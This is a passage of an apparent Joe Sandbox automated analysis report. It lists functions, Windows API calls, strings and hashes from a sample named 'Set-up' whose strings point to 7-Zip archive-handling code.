                                                                                                                                                  Function 0042A1AA Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 460COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: :lc$:lp$:pb
                                                                                                                                                  • API String ID: 3519838083-1922261784
                                                                                                                                                  • Opcode ID: ca1f2c60a5208a8f3698a0098aa9724743d715620118023fe85d9fbb226ad630
                                                                                                                                                  • Instruction ID: 9ce720abd8e92f33691c04e9a9cf6f9c5341b053c52d22b97dd2bbbc08cd80e4
                                                                                                                                                  • Opcode Fuzzy Hash: ca1f2c60a5208a8f3698a0098aa9724743d715620118023fe85d9fbb226ad630
                                                                                                                                                  • Instruction Fuzzy Hash: 3A022830A00215DFCF20DF64D884BAEB7B1AF54304FA4856FE84667291D739AD56CB1B
                                                                                                                                                  Function 00438A66 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 352COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • There is no correct record at the end of archive, xrefs: 00438B03
                                                                                                                                                  • There are no trailing zero-filled records, xrefs: 00438AFC
                                                                                                                                                  • There are data after end of archive, xrefs: 00438B10
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: There are data after end of archive$There are no trailing zero-filled records$There is no correct record at the end of archive
                                                                                                                                                  • API String ID: 3519838083-3898197850
                                                                                                                                                  • Opcode ID: da0eb0e3073f7ff0daa4c77dbd3b997b124db6e5823eaed5d400b611c53c7bc2
                                                                                                                                                  • Instruction ID: 08408d8d713d07cf92e4532a08f71d4e69ede2d4512bef54aeb43ac59318fafe
                                                                                                                                                  • Opcode Fuzzy Hash: da0eb0e3073f7ff0daa4c77dbd3b997b124db6e5823eaed5d400b611c53c7bc2
                                                                                                                                                  • Instruction Fuzzy Hash: 85D1A2719003199BDF14DF64C881BEEF7B5AF18304F1494AFF845AB282DB78AA45CB58
                                                                                                                                                  Function 00405700 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 139COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldiv
                                                                                                                                                  • String ID: $ $M
                                                                                                                                                  • API String ID: 3732870572-1168433142
                                                                                                                                                  • Opcode ID: d30dab09a5f8b071494c043c5077002a98490f53a95e881200a74211b3e95980
                                                                                                                                                  • Instruction ID: aaf1ae1ddf447f5bccbb6bc6aed1fc9bf4189ca47e50831f8e33aa6f46a83ce2
                                                                                                                                                  • Opcode Fuzzy Hash: d30dab09a5f8b071494c043c5077002a98490f53a95e881200a74211b3e95980
                                                                                                                                                  • Instruction Fuzzy Hash: 2041C571B00B489BCB28DE69D8906AFBBF6EF88300F14457ED546E7780D7759908CB54
                                                                                                                                                  Function 0041D5F7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: B$Z$h
                                                                                                                                                  • API String ID: 3519838083-418080759
                                                                                                                                                  • Opcode ID: 3ffe56fbc889e74c839c1029da755e8df845a9d8c945114bbb3e42ff9d28fdaa
                                                                                                                                                  • Instruction ID: 45672ff5436f30ece3f87d63813a26f6dff148f036e3dae11b68e8280a383418
                                                                                                                                                  • Opcode Fuzzy Hash: 3ffe56fbc889e74c839c1029da755e8df845a9d8c945114bbb3e42ff9d28fdaa
                                                                                                                                                  • Instruction Fuzzy Hash: AE21C471A00305AFDB20DF65C881BEEB7A4AF14704F10495FF9469B281D7B8E9448B59
                                                                                                                                                  Function 00405C31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00405C36
                                                                                                                                                  • EnterCriticalSection.KERNEL32(004907B8), ref: 00405C4B
                                                                                                                                                    • Part of subcall function 00405DD6: __EH_prolog.LIBCMT ref: 00405DDB
                                                                                                                                                    • Part of subcall function 00408FB2: __EH_prolog.LIBCMT ref: 00408FB7
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(004907B8,?,?,?), ref: 00405CC7
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog$CriticalSection$EnterLeave
                                                                                                                                                  • String ID: WARNING:
                                                                                                                                                  • API String ID: 2490926211-3509524770
                                                                                                                                                  • Opcode ID: fe0a0d134ecd75967b63d6d63bbff9225859397271b1e75d9dce8f46fca18e28
                                                                                                                                                  • Instruction ID: a1007e8b492637971ac2983d98b960642e0ed6f4f578617c47cc1b15fa36776e
                                                                                                                                                  • Opcode Fuzzy Hash: fe0a0d134ecd75967b63d6d63bbff9225859397271b1e75d9dce8f46fca18e28
                                                                                                                                                  • Instruction Fuzzy Hash: B111C431D00509ABCB05BBA5D806AEEB775EF81318F10806FF005762D2CBBC1A16DB6A
                                                                                                                                                  Function 0041B369 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0046BBC0: RaiseException.KERNEL32(?,?,R@,?,?,?,0047D380,?,?,?,004052E0), ref: 0046BBEE
                                                                                                                                                  • GetProcAddress.KERNEL32(?,MAPISendDocuments), ref: 0041B37A
                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041B387
                                                                                                                                                    • Part of subcall function 00408DDB: FreeLibrary.KERNEL32(00000000,?,00408E08,?,00000000,00000000,004907E0), ref: 00408DE5
                                                                                                                                                    • Part of subcall function 0041C3D2: __EH_prolog.LIBCMT ref: 0041C3D7
                                                                                                                                                    • Part of subcall function 0041B7B0: __EH_prolog.LIBCMT ref: 0041B7B5
                                                                                                                                                    • Part of subcall function 0041B780: __EH_prolog.LIBCMT ref: 0041B785
                                                                                                                                                    • Part of subcall function 0040FCA7: __EH_prolog.LIBCMT ref: 0040FCAC
                                                                                                                                                    • Part of subcall function 00402CA8: __EH_prolog.LIBCMT ref: 00402CAD
                                                                                                                                                  Strings
                                                                                                                                                  • MAPISendDocuments, xrefs: 0041B372
                                                                                                                                                  • 7-Zip cannot find MAPISendDocuments function, xrefs: 0041B38F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog$AddressErrorExceptionFreeLastLibraryProcRaise
                                                                                                                                                  • String ID: 7-Zip cannot find MAPISendDocuments function$MAPISendDocuments
                                                                                                                                                  • API String ID: 2771415571-2393093766
                                                                                                                                                  • Opcode ID: 9a79d2e052b3b0944a602bc27a80f03295d8cad74558eacb9c9d8ab903e3556e
                                                                                                                                                  • Instruction ID: 63a737792763b54b17899fc60556db3708e683c7f68afbe8c55ec8a876f3be9f
                                                                                                                                                  • Opcode Fuzzy Hash: 9a79d2e052b3b0944a602bc27a80f03295d8cad74558eacb9c9d8ab903e3556e
                                                                                                                                                  • Instruction Fuzzy Hash: 9511C13080414CEADB05EBA5D9467DCBB70AF14308F60817FE852722D2DB781A94DB6A
                                                                                                                                                  Function 00471A1D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InterlockedIncrement.KERNEL32(00495F44), ref: 00471A43
                                                                                                                                                  • InterlockedDecrement.KERNEL32(00495F44), ref: 00471A58
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Interlocked$DecrementIncrement
                                                                                                                                                  • String ID: D_I
                                                                                                                                                  • API String ID: 2172605799-3136373921
                                                                                                                                                  • Opcode ID: ea3195717fe9035aec771e3e31c2e450e308b2b154779061212fb93636d15a67
                                                                                                                                                  • Instruction ID: 343d87672d15f9cffb3bfd1e75a11e9cb4baf1915ebd9b1d995eabf9e2a698a3
                                                                                                                                                  • Opcode Fuzzy Hash: ea3195717fe9035aec771e3e31c2e450e308b2b154779061212fb93636d15a67
                                                                                                                                                  • Instruction Fuzzy Hash: E4F0C2321063029FE721AF5AACC5ACF67A4EB81725F25843FF00895160CB6899828A5E
                                                                                                                                                  Function 00458820 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetLargePageMinimum,004033CB,?,?,00000000,00000001,00000000), ref: 0045882A
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00458831
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: GetLargePageMinimum$kernel32.dll
                                                                                                                                                  • API String ID: 1646373207-2515562745
                                                                                                                                                  • Opcode ID: 3a7df8104397c82738d6523640b9e4866e0f85505ffc4a29cffa6132b902bd70
                                                                                                                                                  • Instruction ID: 5740486234f47604aa3fbed5c65f45a8bd59981bca25acc1dd5c97f975a53d11
                                                                                                                                                  • Opcode Fuzzy Hash: 3a7df8104397c82738d6523640b9e4866e0f85505ffc4a29cffa6132b902bd70
                                                                                                                                                  • Instruction Fuzzy Hash: 82D0A7B1641302C69B007FB19C0E73B3758EA50706380443FA814E2171EF28C004CA2D
                                                                                                                                                  Function 0046CD25 Relevance: 6.5, APIs: 5, Instructions: 278COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1bb221b9a95fb7f4ca31475468497c99e8eb3f62489f540233c12b10f4f39474
                                                                                                                                                  • Instruction ID: 0a4e5e5323e6288327fb8a64a7218c7ed8f41d290677ad6958c5e9f416bf5f4e
                                                                                                                                                  • Opcode Fuzzy Hash: 1bb221b9a95fb7f4ca31475468497c99e8eb3f62489f540233c12b10f4f39474
                                                                                                                                                  • Instruction Fuzzy Hash: 83910672D00214AADF21AB69DC849AF7BB9EB48364F200127F494B6291F7398D40C76F
                                                                                                                                                  Function 0046F18A Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00002020,0048DE78,0048DE78,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000), ref: 0046F1AB
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000), ref: 0046F1CF
                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000), ref: 0046F1E9
                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000,?), ref: 0046F2AA
                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,0046F656,00000000,00000010,00000000,00000009,00000009,?,0046C4DF,00000010,00000000,?,00000000), ref: 0046F2C1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocVirtual$FreeHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 714016831-0
                                                                                                                                                  • Opcode ID: 8087f2bfca9d503025f042f70a51b3b6999920a7e17187ad03716b80b29454ec
                                                                                                                                                  • Instruction ID: ba1f12bba68cf4acdd9bc314561366ab72bbdb844dce41ff866c2ae2dd219f5a
                                                                                                                                                  • Opcode Fuzzy Hash: 8087f2bfca9d503025f042f70a51b3b6999920a7e17187ad03716b80b29454ec
                                                                                                                                                  • Instruction Fuzzy Hash: FD3107B5A41B01DFD3309F24EC80B26B7A4E764764F10493BE5959B2D0F779A8448F4E
                                                                                                                                                  Function 00470EEF Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNEL32(00000003,00000003,00000000,00000003,00000000,?,00000002,00000000), ref: 00470F69
                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007370), ref: 00470F73
                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000001,00000003,00000000,?,00000002,00000000), ref: 00471039
                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,Function_00007370), ref: 00471043
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                  • String ID:
